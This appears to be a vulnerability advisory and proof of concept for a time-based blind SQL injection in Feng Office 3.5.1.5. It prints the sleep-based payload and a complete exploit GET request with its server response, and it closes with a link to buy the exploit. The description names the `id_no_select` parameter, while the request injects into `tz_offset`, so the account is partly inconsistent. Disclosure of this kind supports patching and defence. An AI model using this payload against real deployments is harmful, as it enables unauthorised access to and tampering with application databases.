# Titles: fengoffice_3.5.1.5 - SQLi
# Author: nu11secur1ty
# Date: 05/11/2025
# Vendor: https://www.fengoffice.com/
# Software: https://trials.fengoffice.com/register?edition=starter
# Reference: https://portswigger.net/web-security/sql-injection

## Description:

The `id_no_select` parameter appears to be vulnerable to SQL injection
attacks. A single quote was submitted in the `id_no_select` parameter, and
a general error message was returned. Two single quotes were then submitted
and the error message disappeared. You should review the contents of the
error message, and the application's handling of other input, to confirm
whether a vulnerability is present.  Additionally, the payload
'+(select*from(select(sleep(20)))a)+' was submitted in the `id_no_select`
parameter. The application took 21140 milliseconds to respond to the
request, compared with 355 milliseconds for the original request,
indicating that the injected SQL command caused a time delay.

STATUS: HIGH Vulnerability


[+]Exploit GET Request:
- SQLi:

```SQLi
GET
/fengoffice_3.5.1.5/fengoffice_3.5.1.5/index.php?context={}&currentdimension=0&ajax=true&c=account&a=set_timezone&tz_name=Europe%2FSofia&tz_offset=3'%2b(select*from(select(sleep(20)))a)%2b'&_dc=1746872695052
HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=f0keqkg63m62iapui7lch4ed61;
http___localhost_fengoffice_3_5_1_5_fengoffice_3_5_1_5id=2;
http___localhost_fengoffice_3_5_1_5_fengoffice_3_5_1_5token=5e177a5e794b55bb3f2e58843196e01fc1760008;
http___localhost_fengoffice_3_5_1_5_fengoffice_3_5_1_5remember=1
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/fengoffice_3.5.1.5/fengoffice_3.5.1.5/index.php?c=access&a=index
Sec-CH-UA: "Chromium";v="136", "Not;A=Brand";v="24", "Google Chrome";v="136"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

[+]Response:

```
HTTP/1.1 200 OK
Date: Sun, 11 May 2025 06:39:42 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.15
X-Powered-By: PHP/5.6.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Set-Cookie: http___localhost_fengoffice_3_5_1_5_fengoffice_3_5_1_5id=2;
expires=Sun, 25-May-2025 06:39:43 GMT; Max-Age=1209600; path=/
Set-Cookie:
http___localhost_fengoffice_3_5_1_5_fengoffice_3_5_1_5token=5e177a5e794b55bb3f2e58843196e01fc1760008;
expires=Sun, 25-May-2025 06:39:43 GMT; Max-Age=1209600; path=/
Set-Cookie:
http___localhost_fengoffice_3_5_1_5_fengoffice_3_5_1_5remember=1;
expires=Sun, 25-May-2025 06:39:43 GMT; Max-Age=1209600; path=/
Content-Length: 245
Connection: close
Content-Type: text/javascript; charset=UTF-8

{"contents":{},"current":false,"errorCode":0,"errorMessage":"","u":2,"scripts":["http:\/\/localhost\/fengoffice_3.5.1.5\/fengoffice_3.5.1.5\/public\/assets\/javascript\/og\/modules\/addMessageForm.js?rev=1"],"currentPanel":"account","events":[]}
```
# Reproduce:
[href](https://www.nu11secur1ty.com/2025/05/fengoffice3515-sqli.html)

# Buy an exploit only:
[href](https://satoshidisk.com/pay/CONTPR)

# Time spent:
03:15:00